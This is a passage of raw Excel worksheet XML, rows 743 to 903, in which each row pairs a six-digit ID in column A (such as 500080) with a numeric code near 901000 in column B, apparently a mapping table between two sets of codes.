        <v>901082</v>
      </c>
    </row>
    <row r="744" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A744" s="5">
        <v>500114</v>
      </c>
      <c r="B744" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="745" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A745" s="5">
        <v>500114</v>
      </c>
      <c r="B745" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="746" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A746" s="5">
        <v>500114</v>
      </c>
      <c r="B746" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="747" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A747" s="5">
        <v>500114</v>
      </c>
      <c r="B747" s="3">
        <v>901007</v>
      </c>
    </row>
    <row r="748" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A748" s="5">
        <v>500114</v>
      </c>
      <c r="B748" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="749" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A749" s="5">
        <v>500114</v>
      </c>
      <c r="B749" s="3">
        <v>901124</v>
      </c>
    </row>
    <row r="750" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A750" s="5">
        <v>500114</v>
      </c>
      <c r="B750" s="3">
        <v>901111</v>
      </c>
    </row>
    <row r="751" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A751" s="5">
        <v>500114</v>
      </c>
      <c r="B751" s="3">
        <v>901550.00199999998</v>
      </c>
    </row>
    <row r="752" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A752" s="5">
        <v>500114</v>
      </c>
      <c r="B752" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="753" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A753" s="5">
        <v>500114</v>
      </c>
      <c r="B753" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="754" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A754" s="5">
        <v>500114</v>
      </c>
      <c r="B754" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="755" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A755" s="5">
        <v>500003</v>
      </c>
      <c r="B755" s="3">
        <v>901557.00199999998</v>
      </c>
    </row>
    <row r="756" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A756" s="5">
        <v>500003</v>
      </c>
      <c r="B756" s="3">
        <v>901587.00100000005</v>
      </c>
    </row>
    <row r="757" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A757" s="5">
        <v>500003</v>
      </c>
      <c r="B757" s="3">
        <v>901585.00100000005</v>
      </c>
    </row>
    <row r="758" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A758" s="5">
        <v>500003</v>
      </c>
      <c r="B758" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="759" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A759" s="5">
        <v>500003</v>
      </c>
      <c r="B759" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="760" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A760" s="5">
        <v>500080</v>
      </c>
      <c r="B760" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="761" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A761" s="5">
        <v>500080</v>
      </c>
      <c r="B761" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="762" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A762" s="5">
        <v>500080</v>
      </c>
      <c r="B762" s="3">
        <v>901071.00399999996</v>
      </c>
    </row>
    <row r="763" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A763" s="5">
        <v>500080</v>
      </c>
      <c r="B763" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="764" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A764" s="5">
        <v>500080</v>
      </c>
      <c r="B764" s="3">
        <v>901037.00100000005</v>
      </c>
    </row>
    <row r="765" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A765" s="5">
        <v>500080</v>
      </c>
      <c r="B765" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="766" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A766" s="5">
        <v>500080</v>
      </c>
      <c r="B766" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="767" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A767" s="5">
        <v>500080</v>
      </c>
      <c r="B767" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="768" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A768" s="5">
        <v>500080</v>
      </c>
      <c r="B768" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="769" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A769" s="5">
        <v>500080</v>
      </c>
      <c r="B769" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="770" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A770" s="5">
        <v>500080</v>
      </c>
      <c r="B770" s="3">
        <v>901573.00199999998</v>
      </c>
    </row>
    <row r="771" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A771" s="5">
        <v>500080</v>
      </c>
      <c r="B771" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="772" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A772" s="5">
        <v>500080</v>
      </c>
      <c r="B772" s="3">
        <v>901068</v>
      </c>
    </row>
    <row r="773" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A773" s="5">
        <v>500080</v>
      </c>
      <c r="B773" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="774" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A774" s="5">
        <v>500080</v>
      </c>
      <c r="B774" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="775" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A775" s="5">
        <v>500080</v>
      </c>
      <c r="B775" s="3">
        <v>901559.00199999998</v>
      </c>
    </row>
    <row r="776" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A776" s="5">
        <v>500080</v>
      </c>
      <c r="B776" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="777" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A777" s="5">
        <v>500080</v>
      </c>
      <c r="B777" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="778" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A778" s="5">
        <v>500080</v>
      </c>
      <c r="B778" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="779" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A779" s="5">
        <v>500080</v>
      </c>
      <c r="B779" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="780" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A780" s="5">
        <v>500080</v>
      </c>
      <c r="B780" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="781" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A781" s="5">
        <v>500080</v>
      </c>
      <c r="B781" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="782" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A782" s="5">
        <v>500080</v>
      </c>
      <c r="B782" s="3">
        <v>901572</v>
      </c>
    </row>
    <row r="783" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A783" s="5">
        <v>500080</v>
      </c>
      <c r="B783" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="784" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A784" s="5">
        <v>500080</v>
      </c>
      <c r="B784" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="785" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A785" s="5">
        <v>500080</v>
      </c>
      <c r="B785" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="786" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A786" s="5">
        <v>500080</v>
      </c>
      <c r="B786" s="3">
        <v>901218.00300000003</v>
      </c>
    </row>
    <row r="787" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A787" s="5">
        <v>500080</v>
      </c>
      <c r="B787" s="3">
        <v>901218.00800000003</v>
      </c>
    </row>
    <row r="788" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A788" s="5">
        <v>500080</v>
      </c>
      <c r="B788" s="3">
        <v>901218.01</v>
      </c>
    </row>
    <row r="789" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A789" s="5">
        <v>500080</v>
      </c>
      <c r="B789" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="790" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A790" s="5">
        <v>500080</v>
      </c>
      <c r="B790" s="3">
        <v>901195.00199999998</v>
      </c>
    </row>
    <row r="791" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A791" s="5">
        <v>500080</v>
      </c>
      <c r="B791" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="792" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A792" s="5">
        <v>500080</v>
      </c>
      <c r="B792" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="793" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A793" s="5">
        <v>500080</v>
      </c>
      <c r="B793" s="3">
        <v>901220</v>
      </c>
    </row>
    <row r="794" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A794" s="5">
        <v>500052</v>
      </c>
      <c r="B794" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="795" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A795" s="5">
        <v>500052</v>
      </c>
      <c r="B795" s="3">
        <v>901560.00300000003</v>
      </c>
    </row>
    <row r="796" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A796" s="5">
        <v>500052</v>
      </c>
      <c r="B796" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="797" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A797" s="5">
        <v>500052</v>
      </c>
      <c r="B797" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="798" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A798" s="5">
        <v>500052</v>
      </c>
      <c r="B798" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="799" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A799" s="5">
        <v>500052</v>
      </c>
      <c r="B799" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="800" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A800" s="5">
        <v>500052</v>
      </c>
      <c r="B800" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="801" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A801" s="5">
        <v>500132</v>
      </c>
      <c r="B801" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="802" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A802" s="5">
        <v>500132</v>
      </c>
      <c r="B802" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="803" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A803" s="5">
        <v>500132</v>
      </c>
      <c r="B803" s="3">
        <v>901572</v>
      </c>
    </row>
    <row r="804" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A804" s="5">
        <v>500132</v>
      </c>
      <c r="B804" s="3">
        <v>901090.00300000003</v>
      </c>
    </row>
    <row r="805" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A805" s="5">
        <v>500132</v>
      </c>
      <c r="B805" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="806" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A806" s="5">
        <v>500070</v>
      </c>
      <c r="B806" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="807" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A807" s="5">
        <v>500070</v>
      </c>
      <c r="B807" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="808" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A808" s="5">
        <v>500070</v>
      </c>
      <c r="B808" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="809" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A809" s="5">
        <v>500070</v>
      </c>
      <c r="B809" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="810" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A810" s="5">
        <v>500070</v>
      </c>
      <c r="B810" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="811" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A811" s="5">
        <v>500070</v>
      </c>
      <c r="B811" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="812" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A812" s="5">
        <v>500070</v>
      </c>
      <c r="B812" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="813" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A813" s="5">
        <v>500070</v>
      </c>
      <c r="B813" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="814" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A814" s="5">
        <v>500070</v>
      </c>
      <c r="B814" s="3">
        <v>901566.00300000003</v>
      </c>
    </row>
    <row r="815" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A815" s="5">
        <v>500070</v>
      </c>
      <c r="B815" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="816" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A816" s="5">
        <v>500070</v>
      </c>
      <c r="B816" s="3">
        <v>901218.00100000005</v>
      </c>
    </row>
    <row r="817" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A817" s="5">
        <v>500070</v>
      </c>
      <c r="B817" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="818" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A818" s="5">
        <v>500070</v>
      </c>
      <c r="B818" s="3">
        <v>901476</v>
      </c>
    </row>
    <row r="819" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A819" s="5">
        <v>500070</v>
      </c>
      <c r="B819" s="3">
        <v>901437</v>
      </c>
    </row>
    <row r="820" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A820" s="5">
        <v>500012</v>
      </c>
      <c r="B820" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="821" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A821" s="5">
        <v>500012</v>
      </c>
      <c r="B821" s="3">
        <v>901547.00899999996</v>
      </c>
    </row>
    <row r="822" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A822" s="5">
        <v>500012</v>
      </c>
      <c r="B822" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="823" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A823" s="5">
        <v>500012</v>
      </c>
      <c r="B823" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="824" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A824" s="5">
        <v>500012</v>
      </c>
      <c r="B824" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="825" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A825" s="5">
        <v>500012</v>
      </c>
      <c r="B825" s="3">
        <v>901573.00100000005</v>
      </c>
    </row>
    <row r="826" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A826" s="5">
        <v>500012</v>
      </c>
      <c r="B826" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="827" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A827" s="5">
        <v>500012</v>
      </c>
      <c r="B827" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="828" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A828" s="5">
        <v>500012</v>
      </c>
      <c r="B828" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="829" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A829" s="5">
        <v>500012</v>
      </c>
      <c r="B829" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="830" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A830" s="5">
        <v>500012</v>
      </c>
      <c r="B830" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="831" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A831" s="5">
        <v>500012</v>
      </c>
      <c r="B831" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="832" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A832" s="5">
        <v>500012</v>
      </c>
      <c r="B832" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="833" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A833" s="5">
        <v>500012</v>
      </c>
      <c r="B833" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="834" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A834" s="5">
        <v>500012</v>
      </c>
      <c r="B834" s="3">
        <v>901091</v>
      </c>
    </row>
    <row r="835" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A835" s="5">
        <v>500012</v>
      </c>
      <c r="B835" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="836" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A836" s="5">
        <v>500012</v>
      </c>
      <c r="B836" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="837" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A837" s="5">
        <v>500012</v>
      </c>
      <c r="B837" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="838" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A838" s="5">
        <v>500012</v>
      </c>
      <c r="B838" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="839" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A839" s="5">
        <v>500012</v>
      </c>
      <c r="B839" s="3">
        <v>901124</v>
      </c>
    </row>
    <row r="840" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A840" s="5">
        <v>500012</v>
      </c>
      <c r="B840" s="3">
        <v>901080</v>
      </c>
    </row>
    <row r="841" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A841" s="5">
        <v>500012</v>
      </c>
      <c r="B841" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="842" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A842" s="5">
        <v>500012</v>
      </c>
      <c r="B842" s="3">
        <v>901497</v>
      </c>
    </row>
    <row r="843" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A843" s="5">
        <v>500012</v>
      </c>
      <c r="B843" s="3">
        <v>901497.00100000005</v>
      </c>
    </row>
    <row r="844" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A844" s="5">
        <v>500012</v>
      </c>
      <c r="B844" s="3">
        <v>901497.00199999998</v>
      </c>
    </row>
    <row r="845" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A845" s="5">
        <v>500079</v>
      </c>
      <c r="B845" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="846" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A846" s="5">
        <v>500079</v>
      </c>
      <c r="B846" s="3">
        <v>901187</v>
      </c>
    </row>
    <row r="847" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A847" s="5">
        <v>500079</v>
      </c>
      <c r="B847" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="848" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A848" s="5">
        <v>500079</v>
      </c>
      <c r="B848" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="849" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A849" s="5">
        <v>500079</v>
      </c>
      <c r="B849" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="850" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A850" s="5">
        <v>500079</v>
      </c>
      <c r="B850" s="3">
        <v>901221</v>
      </c>
    </row>
    <row r="851" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A851" s="5">
        <v>500079</v>
      </c>
      <c r="B851" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="852" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A852" s="5">
        <v>500105</v>
      </c>
      <c r="B852" s="3">
        <v>901110</v>
      </c>
    </row>
    <row r="853" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A853" s="5">
        <v>500105</v>
      </c>
      <c r="B853" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="854" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A854" s="5">
        <v>500105</v>
      </c>
      <c r="B854" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="855" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A855" s="5">
        <v>500105</v>
      </c>
      <c r="B855" s="3">
        <v>901200</v>
      </c>
    </row>
    <row r="856" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A856" s="5">
        <v>500105</v>
      </c>
      <c r="B856" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="857" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A857" s="5">
        <v>500105</v>
      </c>
      <c r="B857" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="858" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A858" s="5">
        <v>500105</v>
      </c>
      <c r="B858" s="3">
        <v>901040</v>
      </c>
    </row>
    <row r="859" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A859" s="5">
        <v>500105</v>
      </c>
      <c r="B859" s="3">
        <v>901571</v>
      </c>
    </row>
    <row r="860" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A860" s="5">
        <v>500105</v>
      </c>
      <c r="B860" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="861" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A861" s="5">
        <v>500105</v>
      </c>
      <c r="B861" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="862" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A862" s="5">
        <v>500009</v>
      </c>
      <c r="B862" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="863" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A863" s="5">
        <v>500009</v>
      </c>
      <c r="B863" s="3">
        <v>901546.00800000003</v>
      </c>
    </row>
    <row r="864" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A864" s="5">
        <v>500009</v>
      </c>
      <c r="B864" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="865" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A865" s="5">
        <v>500009</v>
      </c>
      <c r="B865" s="3">
        <v>901027.005</v>
      </c>
    </row>
    <row r="866" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A866" s="5">
        <v>500009</v>
      </c>
      <c r="B866" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="867" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A867" s="5">
        <v>500009</v>
      </c>
      <c r="B867" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="868" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A868" s="5">
        <v>500009</v>
      </c>
      <c r="B868" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="869" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A869" s="5">
        <v>500009</v>
      </c>
      <c r="B869" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="870" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A870" s="5">
        <v>500009</v>
      </c>
      <c r="B870" s="3">
        <v>901218.01</v>
      </c>
    </row>
    <row r="871" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A871" s="5">
        <v>500009</v>
      </c>
      <c r="B871" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="872" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A872" s="5">
        <v>500035</v>
      </c>
      <c r="B872" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="873" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A873" s="5">
        <v>500035</v>
      </c>
      <c r="B873" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="874" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A874" s="5">
        <v>500035</v>
      </c>
      <c r="B874" s="3">
        <v>901566</v>
      </c>
    </row>
    <row r="875" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A875" s="5">
        <v>500035</v>
      </c>
      <c r="B875" s="3">
        <v>901195.00199999998</v>
      </c>
    </row>
    <row r="876" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A876" s="5">
        <v>500074</v>
      </c>
      <c r="B876" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="877" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A877" s="5">
        <v>500074</v>
      </c>
      <c r="B877" s="3">
        <v>901098</v>
      </c>
    </row>
    <row r="878" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A878" s="5">
        <v>500074</v>
      </c>
      <c r="B878" s="3">
        <v>901071</v>
      </c>
    </row>
    <row r="879" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A879" s="5">
        <v>500074</v>
      </c>
      <c r="B879" s="3">
        <v>901560</v>
      </c>
    </row>
    <row r="880" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A880" s="5">
        <v>500074</v>
      </c>
      <c r="B880" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="881" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A881" s="5">
        <v>500074</v>
      </c>
      <c r="B881" s="3">
        <v>901547.00899999996</v>
      </c>
    </row>
    <row r="882" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A882" s="5">
        <v>500074</v>
      </c>
      <c r="B882" s="3">
        <v>901110.00199999998</v>
      </c>
    </row>
    <row r="883" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A883" s="5">
        <v>500074</v>
      </c>
      <c r="B883" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="884" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A884" s="5">
        <v>500074</v>
      </c>
      <c r="B884" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="885" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A885" s="5">
        <v>500074</v>
      </c>
      <c r="B885" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="886" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A886" s="5">
        <v>500074</v>
      </c>
      <c r="B886" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="887" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A887" s="5">
        <v>500074</v>
      </c>
      <c r="B887" s="3">
        <v>901136.00100000005</v>
      </c>
    </row>
    <row r="888" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A888" s="5">
        <v>500074</v>
      </c>
      <c r="B888" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="889" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A889" s="5">
        <v>500074</v>
      </c>
      <c r="B889" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="890" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A890" s="5">
        <v>500074</v>
      </c>
      <c r="B890" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="891" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A891" s="5">
        <v>500074</v>
      </c>
      <c r="B891" s="3">
        <v>901114.00199999998</v>
      </c>
    </row>
    <row r="892" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A892" s="5">
        <v>500074</v>
      </c>
      <c r="B892" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="893" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A893" s="5">
        <v>500074</v>
      </c>
      <c r="B893" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="894" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A894" s="5">
        <v>500074</v>
      </c>
      <c r="B894" s="3">
        <v>901187</v>
      </c>
    </row>
    <row r="895" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A895" s="5">
        <v>500074</v>
      </c>
      <c r="B895" s="3">
        <v>901564.00199999998</v>
      </c>
    </row>
    <row r="896" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A896" s="5">
        <v>500074</v>
      </c>
      <c r="B896" s="3">
        <v>901562.00399999996</v>
      </c>
    </row>
    <row r="897" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A897" s="5">
        <v>500074</v>
      </c>
      <c r="B897" s="3">
        <v>901070.00100000005</v>
      </c>
    </row>
    <row r="898" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A898" s="5">
        <v>500074</v>
      </c>
      <c r="B898" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="899" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A899" s="5">
        <v>500074</v>
      </c>
      <c r="B899" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="900" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A900" s="5">
        <v>500074</v>
      </c>
      <c r="B900" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="901" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A901" s="5">
        <v>500074</v>
      </c>
      <c r="B901" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="902" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A902" s="5">
        <v>500074</v>
      </c>
      <c r="B902" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="903" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A903" s="5">
        <v>500074</v>
      </c>
